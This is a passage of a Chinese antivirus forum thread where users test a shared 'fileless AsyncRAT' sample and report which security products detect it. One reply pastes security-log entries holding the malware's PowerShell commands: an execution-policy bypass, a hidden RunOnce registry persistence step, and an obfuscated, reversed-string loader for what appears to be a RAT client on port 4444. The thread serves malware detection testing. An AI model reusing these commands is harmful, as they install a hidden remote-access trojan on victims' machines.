12
返回列表 发新帖
楼主: 图钉鱼
收起左侧

[病毒样本] 无文件AsyncRAT

[复制链接]
Loyisa
发表于 7 天前 | 显示全部楼层
飞翔的蒲公英 发表于 2025-6-18 11:11
解压码是什么?输入infected显示密码错误
  1. ps:virus
复制代码

多看看
飞翔的蒲公英
发表于 7 天前 | 显示全部楼层
本帖最后由 飞翔的蒲公英 于 2025-6-18 11:25 编辑

安天智甲:Trojan/VBA.GenScript

奇安信天守:Trojan.Boxter.0a4





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Renascence
发表于 7 天前 | 显示全部楼层
SESC静态扫描miss,运行后被自适应防护拦截,威胁名称ACM.Ps-Reg!g1
图钉鱼
 楼主| 发表于 7 天前 | 显示全部楼层
Renascence 发表于 2025-6-18 12:16
SESC静态扫描miss,运行后被自适应防护拦截,威胁名称ACM.Ps-Reg!g1

SESC对安全的颗粒度比SEP高的多的多,EDR级别的主防
吃瓜群众第123位
发表于 7 天前 | 显示全部楼层
360 kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 7 天前 | 显示全部楼层
火绒
运行
  1. 防护项目:利用PowerShell执行可疑脚本
  2. 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  3. 执行命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\User\Desktop\downloaded.ps1'"
  4. 操作结果:已允许
复制代码
  1. 防护项目:隐藏执行PowerShell
  2. 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  3. 执行命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c " = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+System.Management.Automation.InvocationInfo.MyCommand+[char]34; Set-ItemProperty 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' 'conhost.exe --headless powershell -nop -w hidden -c cmd /c (Get-ItemProperty -Path ''HKCU:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'').win'; Set-ItemProperty 'HKCU:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' ;='ask='+'=g'+'ClRmL'+'0V2b'+'tFm'+'blk=';=.Substring(3,16).ToCharArray();[array]::reverse();=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String( -join ''));='}}};)00003(peelS.daerhT}{ hctac } ;)k(b { yrt{ )eurt( elihw{ )k gnirts(am diov citats cilbup}};)d(a};nruter;)(h.c{ )llun == d( fi;)(k.c = d ][etyb{ )eurt( elihw;)4444 ,k(A wen = c{ )k gnirts(b diov citats cilbup}};kaerb ;)(z :051 esac;kaerb ;)c(y :002 esac;kaerb ;)c(x :001 esac;kaerb;)c(v :05 esac{ )]0[b( hct
  4. 操作结果:已允许
复制代码
cxllxc
发表于 7 天前 | 显示全部楼层
WD miss
biue
发表于 7 天前 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ongarabazanade
发表于 4 天前 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-6-25 18:27 , Processed in 0.090686 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表